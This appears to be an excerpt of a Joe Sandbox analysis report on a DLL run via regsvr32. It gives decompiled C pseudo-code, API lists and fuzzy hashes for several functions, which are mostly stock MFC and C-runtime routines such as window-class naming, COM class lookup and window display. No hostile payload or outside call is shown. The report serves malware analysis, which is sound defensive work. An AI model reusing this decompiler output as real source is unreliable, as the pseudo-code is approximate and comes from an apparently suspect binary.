                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: @
                                                                                                                • API String ID: 431132790-2766056989
                                                                                                                • Opcode ID: e4fe646538f7a1e1a6620cc9ee88ccb0437611cecabb20d81ca85b59a8d3e10e
                                                                                                                • Instruction ID: 27d6e068b945a38a4e3262720f663981c887c24b1d40a3015d78c7ca2024549e
                                                                                                                • Opcode Fuzzy Hash: e4fe646538f7a1e1a6620cc9ee88ccb0437611cecabb20d81ca85b59a8d3e10e
                                                                                                                • Instruction Fuzzy Hash: 3651C470E0025A9FDB04CFA8C888AEEB7F9FF48304B60456AE516EB251E775AD45CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10017046 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10017046(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t35;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t40;
				intOrPtr* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t61;
				void* _t64;
				intOrPtr _t66;
				void* _t76;

				_t76 = __eflags;
				E10021FD9(1);
				L10048E48(0, 0);
				asm("int3");
				_push(_t56);
				_push(_t64);
				_push(_t61);
				_t66 = E1001DD4F(_t56, _t61, _t64, _t76) + 0x7c;
				_t57 =  *((intOrPtr*)(E1001E302(_t56, _t61, _t66, _t76) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L5:
					_v8 =  *((intOrPtr*)(E10049097(__eflags)));
					_t35 = E10049097(__eflags);
					_push(_a16);
					 *_t35 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E1004C1D3(_t66, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t57);
				} else {
					_t79 = _a16;
					if(_a16 != 0) {
						goto L5;
					} else {
						_v8 =  *((intOrPtr*)(E10049097(_t79)));
						_t54 = E10049097(_t79);
						_push(_a4);
						 *_t54 = 0;
						E1004C1D3(_t66, 0x60, 0x5f, "Afx:%p:%x", _t57);
					}
				}
				_t37 = E10049097(_t79);
				_t80 =  *_t37;
				if( *_t37 == 0) {
					_t38 = E10049097(__eflags);
					_t60 = _v8;
					 *_t38 = _v8;
				} else {
					E1000AD19( *((intOrPtr*)(E10049097(_t80))));
					_pop(_t60);
				}
				_push( &_v48);
				_push(_t66);
				_push(_t57);
				_t40 = E1001242B(_t57, _t60, 0, _t66, _t80);
				_t81 = _t40;
				if(_t40 == 0) {
					_v48 = _a4;
					_v44 = DefWindowProcA;
					_v28 = _a16;
					_v24 = _a8;
					_v20 = _a12;
					_push( &_v48);
					_v36 = 0;
					_v40 = 0;
					_v32 = _t57;
					_v16 = 0;
					_v12 = _t66;
					if(L10016FC9(_t57, _t60, 0, _t66, _t81) == 0) {
						E1000C2E1(_t60);
					}
				}
				return _t66;
			}





























                                                                                                                0x10017046
                                                                                                                0x10017048
                                                                                                                0x10017051
                                                                                                                0x10017056
                                                                                                                0x1001705d
                                                                                                                0x1001705e
                                                                                                                0x1001705f
                                                                                                                0x10017067
                                                                                                                0x1001706f
                                                                                                                0x10017077
                                                                                                                0x100170ac
                                                                                                                0x100170b3
                                                                                                                0x100170b6
                                                                                                                0x100170bb
                                                                                                                0x100170be
                                                                                                                0x100170c0
                                                                                                                0x100170c3
                                                                                                                0x100170c6
                                                                                                                0x100170d4
                                                                                                                0x1001707e
                                                                                                                0x1001707e
                                                                                                                0x10017081
                                                                                                                0x00000000
                                                                                                                0x10017083
                                                                                                                0x1001708a
                                                                                                                0x1001708d
                                                                                                                0x10017092
                                                                                                                0x10017095
                                                                                                                0x100170a2
                                                                                                                0x100170a7
                                                                                                                0x10017081
                                                                                                                0x100170dc
                                                                                                                0x100170e1
                                                                                                                0x100170e3
                                                                                                                0x100170f4
                                                                                                                0x100170f9
                                                                                                                0x100170fc
                                                                                                                0x100170e5
                                                                                                                0x100170ec
                                                                                                                0x100170f1
                                                                                                                0x100170f1
                                                                                                                0x10017101
                                                                                                                0x10017102
                                                                                                                0x10017103
                                                                                                                0x10017104
                                                                                                                0x1001710c
                                                                                                                0x1001710e
                                                                                                                0x10017113
                                                                                                                0x1001711b
                                                                                                                0x10017121
                                                                                                                0x10017127
                                                                                                                0x1001712d
                                                                                                                0x10017133
                                                                                                                0x10017134
                                                                                                                0x10017137
                                                                                                                0x1001713a
                                                                                                                0x1001713d
                                                                                                                0x10017140
                                                                                                                0x1001714a
                                                                                                                0x1001714c
                                                                                                                0x1001714c
                                                                                                                0x1001714a
                                                                                                                0x10017157

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10021FD9: LeaveCriticalSection.KERNEL32(?,10020559,00000010,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 10021FF0
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10017051
                                                                                                                  • Part of subcall function 10048E48: RaiseException.KERNEL32(00000001,?,?,00000058,00000001,?,1000CECE,00000000,?,00000058,10006BB6), ref: 10048E88
                                                                                                                • __snprintf_s.LIBCMT ref: 100170A2
                                                                                                                  • Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8
                                                                                                                • __snprintf_s.LIBCMT ref: 100170D4
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snprintf_s$CriticalExceptionException@8LeaveRaiseSectionThrow__getptd_noexit__vsnprintf_s_l
                                                                                                                • String ID: Afx:%p:%x
                                                                                                                • API String ID: 3966753335-3201128726
                                                                                                                • Opcode ID: a2364757c673005b9556abfa695244951a75b134b50bb4799cc6880a16461c15
                                                                                                                • Instruction ID: 1dbae72e943724650c3f85dc51fc8ef03dc1c7148edf81a1682273a05273279e
                                                                                                                • Opcode Fuzzy Hash: a2364757c673005b9556abfa695244951a75b134b50bb4799cc6880a16461c15
                                                                                                                • Instruction Fuzzy Hash: 64212EB5900309EFDB11DFA9D841A9EBBF4FF49290F114026F908AB252D770E9818BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10041624 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10041624(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t43;
				signed short* _t47;
				void* _t52;
				intOrPtr* _t56;
				void* _t57;
				void* _t60;

				_t60 = __eflags;
				_push(0x10);
				E10047680(0x100915ca, __ebx, __edi, __esi);
				_t56 =  *((intOrPtr*)(_t57 + 8)) + 0xffffffd0;
				E1001E397(_t57 - 0x1c, _t60,  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) - 0x14)));
				_t47 =  *(_t57 + 0xc);
				 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
				_t52 = E1004104F(_t56, _t47, 1);
				if(_t52 != 0) {
					E10049170(_t52,  *((intOrPtr*)(_t57 + 0x10)), 0, 0xc);
					_t12 = _t52 + 0x14; // 0x14
					_t36 = _t12;
					__eflags =  *_t12;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t57 + 8)) = 0x80040064;
						 *(_t57 - 4) = 1;
						_t38 =  *((intOrPtr*)( *_t56 + 0x58))(_t47,  *((intOrPtr*)(_t57 + 0x10)));
						__eflags = _t38;
						if(_t38 != 0) {
							 *((intOrPtr*)(_t57 + 8)) = 0;
						}
						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
						__eflags =  *((intOrPtr*)(_t57 - 0x18));
						if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
							_push( *((intOrPtr*)(_t57 - 0x1c)));
							_push(0);
							E1001D714();
						}
						_t39 =  *((intOrPtr*)(_t57 + 8));
					} else {
						_t43 = E1000B0A9(_t47, 0, _t56, __eflags,  *_t47 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x10)), _t36);
						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
						__eflags = _t43;
						if(_t43 != 0) {
							__eflags =  *((intOrPtr*)(_t57 - 0x18));
							if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
								_push( *((intOrPtr*)(_t57 - 0x1c)));
								_push(0);
								E1001D714();
							}
							_t39 = 0;
						} else {
							__eflags =  *((intOrPtr*)(_t57 - 0x18));
							if( *((intOrPtr*)(_t57 - 0x18)) == 0) {
								goto L4;
							} else {
								_push( *((intOrPtr*)(_t57 - 0x1c)));
								_push(0);
								goto L3;
							}
							L18:
						}
					}
				} else {
					 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
					if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
						_push( *((intOrPtr*)(_t57 - 0x1c)));
						_push(0);
						L3:
						E1001D714();
					}
					L4:
					_t39 = 0x80040064;
				}
				return E10047725(_t39);
				goto L18;
			}











                                                                                                                0x10041624
                                                                                                                0x10041624
                                                                                                                0x1004162b
                                                                                                                0x10041636
                                                                                                                0x1004163c
                                                                                                                0x10041641
                                                                                                                0x10041644
                                                                                                                0x10041652
                                                                                                                0x10041658
                                                                                                                0x1004167c
                                                                                                                0x10041681
                                                                                                                0x10041681
                                                                                                                0x10041689
                                                                                                                0x1004168b
                                                                                                                0x100416c7
                                                                                                                0x100416ce
                                                                                                                0x100416d2
                                                                                                                0x100416d5
                                                                                                                0x100416d7
                                                                                                                0x100416d9
                                                                                                                0x100416d9
                                                                                                                0x100416f9
                                                                                                                0x100416fd
                                                                                                                0x10041700
                                                                                                                0x10041702
                                                                                                                0x10041705
                                                                                                                0x10041706
                                                                                                                0x10041706
                                                                                                                0x1004170b
                                                                                                                0x1004168d
                                                                                                                0x10041695
                                                                                                                0x1004169a
                                                                                                                0x1004169e
                                                                                                                0x100416a0
                                                                                                                0x100416ad
                                                                                                                0x100416b0
                                                                                                                0x100416b2
                                                                                                                0x100416b5
                                                                                                                0x100416b6
                                                                                                                0x100416b6
                                                                                                                0x100416bb
                                                                                                                0x100416a2
                                                                                                                0x100416a2
                                                                                                                0x100416a5
                                                                                                                0x00000000
                                                                                                                0x100416a7
                                                                                                                0x100416a7
                                                                                                                0x100416aa
                                                                                                                0x00000000
                                                                                                                0x100416aa
                                                                                                                0x00000000
                                                                                                                0x100416a5
                                                                                                                0x100416a0
                                                                                                                0x1004165a
                                                                                                                0x1004165a
                                                                                                                0x10041661
                                                                                                                0x10041663
                                                                                                                0x10041666
                                                                                                                0x10041667
                                                                                                                0x10041667
                                                                                                                0x10041667
                                                                                                                0x1004166c
                                                                                                                0x1004166c
                                                                                                                0x1004166c
                                                                                                                0x10041713
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3_catch_memset
                                                                                                                • String ID: d
                                                                                                                • API String ID: 1022661273-2564639436
                                                                                                                • Opcode ID: b9e012aa01af075eff093844a8ffeee4cf2b831100157110da877549c92efa64
                                                                                                                • Instruction ID: f21327fa9afeab172bd533079007e35d76d7159773825f99a2a971ae6053a1df
                                                                                                                • Opcode Fuzzy Hash: b9e012aa01af075eff093844a8ffeee4cf2b831100157110da877549c92efa64
                                                                                                                • Instruction Fuzzy Hash: E9218D30A00649EBCF11DFA4C881AEE7BB6EF04354F324625F560EA091D735DA91DB69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10029E28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10029E28(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t21;
				struct HINSTANCE__* _t25;
				_Unknown_base(*)()* _t26;
				void* _t29;
				signed int* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				_t51 = __eflags;
				_t44 = __edx;
				_t34 = __ebx;
				_push(4);
				E1004764D(0x1008ff93, __ebx, __edi, __esi);
				_t48 =  *(_t50 + 0x10);
				 *_t48 =  *_t48 & 0x00000000;
				E10029D24(__ebx, __edx, __edi, _t51, _t50 - 0x10,  *((intOrPtr*)(_t50 + 8)));
				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
				_t21 = E100184C0();
				_t35 = _t50 + 0x10;
				L1000140B(_t50 + 0x10, _t21);
				 *(_t50 - 4) = 1;
				if(E100296B0(__ebx,  *((intOrPtr*)(_t50 - 0x10)), _t50 + 0x10) != 0) {
					_t46 =  *(_t50 + 0x10);
					_push( *(_t50 + 0x10));
					_t25 = E10012699(_t34, _t35,  *(_t50 + 0x10), _t48, __eflags);
					__eflags = _t25;
					if(_t25 != 0) {
						_t26 = GetProcAddress(_t25, "DllGetClassObject");
						__eflags = _t26;
						if(_t26 == 0) {
							_t49 = 0x800401f9;
						} else {
							_t49 =  *_t26( *((intOrPtr*)(_t50 + 8)),  *((intOrPtr*)(_t50 + 0xc)), _t48);
						}
					} else {
						_t49 = 0x80040154;
					}
					L100013E3(_t46 - 0x10, _t44);
					L100013E3( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, _t44);
					_t29 = _t49;
				} else {
					L100013E3( &(( *(_t50 + 0x10))[0xfffffffffffffffc]), __edx);
					L100013E3( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, __edx);
					_t29 = 0x80040154;
				}
				return E10047725(_t29);
			}











                                                                                                                0x10029e28
                                                                                                                0x10029e28
                                                                                                                0x10029e28
                                                                                                                0x10029e28
                                                                                                                0x10029e2f
                                                                                                                0x10029e37
                                                                                                                0x10029e3a
                                                                                                                0x10029e41
                                                                                                                0x10029e46
                                                                                                                0x10029e4a
                                                                                                                0x10029e50
                                                                                                                0x10029e53
                                                                                                                0x10029e5f
                                                                                                                0x10029e6a
                                                                                                                0x10029e8f
                                                                                                                0x10029e92
                                                                                                                0x10029e93
                                                                                                                0x10029e98
                                                                                                                0x10029e9b
                                                                                                                0x10029ebf
                                                                                                                0x10029ec5
                                                                                                                0x10029ec7
                                                                                                                0x10029ed6
                                                                                                                0x10029ec9
                                                                                                                0x10029ed2
                                                                                                                0x10029ed2
                                                                                                                0x10029e9d
                                                                                                                0x10029e9d
                                                                                                                0x10029e9d
                                                                                                                0x10029ea5
                                                                                                                0x10029eb0
                                                                                                                0x10029eb5
                                                                                                                0x10029e6c
                                                                                                                0x10029e72
                                                                                                                0x10029e7d
                                                                                                                0x10029e82
                                                                                                                0x10029e82
                                                                                                                0x10029e8c

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10029E2F
                                                                                                                  • Part of subcall function 10029D24: _swprintf.LIBCMT ref: 10029D8A
                                                                                                                  • Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
                                                                                                                  • Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
                                                                                                                  • Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
                                                                                                                  • Part of subcall function 100296B0: RegQueryValueExA.ADVAPI32 ref: 10029731
                                                                                                                  • Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 10029741
                                                                                                                  • Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 10029746
                                                                                                                  • Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 1002974B
                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetClassObject,00000000,00000004,10029F08,?,100A592C,00000000), ref: 10029EBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$AddressH_prolog3ProcQueryValue_swprintf
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 2239898804-1075368562
                                                                                                                • Opcode ID: 9008d4399bc21897604654863b1c71837f69836ba958acecc525d96e6063ee5b
                                                                                                                • Instruction ID: b806fbc304eb1717afb72819c6f168350187bc08b8103b5c1930cd9a947c6215
                                                                                                                • Opcode Fuzzy Hash: 9008d4399bc21897604654863b1c71837f69836ba958acecc525d96e6063ee5b
                                                                                                                • Instruction Fuzzy Hash: FD118F79900256ABDF00DFA0CC41BAE37A4FF403A4F550528B924A72E2DB74A910D7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003F90E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1003F90E(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				struct HWND__* _v52;
				unsigned int _v76;
				intOrPtr _v80;
				char _v84;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t30;
				void* _t35;
				void* _t36;
				intOrPtr* _t37;

				_t37 = __ecx;
				_t36 = E10013F46(__ebx, __ecx, _t35, __eflags);
				_t39 = _t36;
				if(_t36 != 0) {
					_v84 = 0x50;
					_v80 = 0x11;
					 *((intOrPtr*)( *_t37 + 0x110))(0x41d, _a4,  &_v84);
					_t16 = E100203C2(0x1009e47c, E10014011(_t37, _t36, _t37, _t39, _v52));
					if(_t16 == 0) {
						_t19 = GetWindowLongA(_v52, 0xfffffff0) >> 0x0000001c & 0x00000001;
						__eflags = _t19;
					} else {
						_t19 =  *((intOrPtr*)( *_t16 + 0x154))();
					}
					_t30 =  !(_v76 >> 3) & 0x00000001;
					if(_t19 != _t30) {
						asm("sbb ecx, ecx");
						ShowWindow(_v52,  ~_t30 & 0x00000005);
					}
				}
				return _t36;
			}
















                                                                                                                0x1003f916
                                                                                                                0x1003f91d
                                                                                                                0x1003f91f
                                                                                                                0x1003f921
                                                                                                                0x1003f933
                                                                                                                0x1003f93a
                                                                                                                0x1003f941
                                                                                                                0x1003f955
                                                                                                                0x1003f95e
                                                                                                                0x1003f97a
                                                                                                                0x1003f97a
                                                                                                                0x1003f960
                                                                                                                0x1003f964
                                                                                                                0x1003f964
                                                                                                                0x1003f985
                                                                                                                0x1003f98a
                                                                                                                0x1003f98e
                                                                                                                0x1003f997
                                                                                                                0x1003f997
                                                                                                                0x1003f98a
                                                                                                                0x1003f9a2

                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 1003F971
                                                                                                                • ShowWindow.USER32(?,?), ref: 1003F997
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongShow
                                                                                                                • String ID: P
                                                                                                                • API String ID: 2659037557-3110715001
                                                                                                                • Opcode ID: 1ab7d56d4179d4e8b5d6a0f99de9d15fc7cca27e39cc9b254fc4de0f0fc89069
                                                                                                                • Instruction ID: 9d75cb92e2a5c536025ce107791e61cda28db8ead2f2e4480c91a0b11d871f17
                                                                                                                • Opcode Fuzzy Hash: 1ab7d56d4179d4e8b5d6a0f99de9d15fc7cca27e39cc9b254fc4de0f0fc89069
                                                                                                                • Instruction Fuzzy Hash: C801C435620114AFDB099B64CC4AAFE7BB5EF44711F05022DF592DA195DB749844CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10019B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E10019B8F(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x100b9e70; // 0xbb35530
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E10019530(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E100198A8(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E1004763E(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                                0x10019b98
                                                                                                                0x10019b9f
                                                                                                                0x10019ba5
                                                                                                                0x10019bb5
                                                                                                                0x10019bbd
                                                                                                                0x10019c14
                                                                                                                0x10019c14
                                                                                                                0x10019c14
                                                                                                                0x10019bc3
                                                                                                                0x10019bcb
                                                                                                                0x10019bd1
                                                                                                                0x10019bd9
                                                                                                                0x10019bda
                                                                                                                0x10019bde
                                                                                                                0x10019be9
                                                                                                                0x10019bef
                                                                                                                0x10019bf0
                                                                                                                0x10019bf1
                                                                                                                0x00000000
                                                                                                                0x10019bf3
                                                                                                                0x10019bfe
                                                                                                                0x10019c0d
                                                                                                                0x10019c0d
                                                                                                                0x10019bf1
                                                                                                                0x10019c22

                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10019BB5
                                                                                                                • PathFindExtensionA.SHLWAPI(?), ref: 10019BCB
                                                                                                                  • Part of subcall function 10019530: _strcpy_s.LIBCMT ref: 1001953C
                                                                                                                  • Part of subcall function 100198A8: __EH_prolog3.LIBCMT ref: 100198C7
                                                                                                                  • Part of subcall function 100198A8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 100198E8
                                                                                                                  • Part of subcall function 100198A8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 100198F9
                                                                                                                  • Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 1001992F
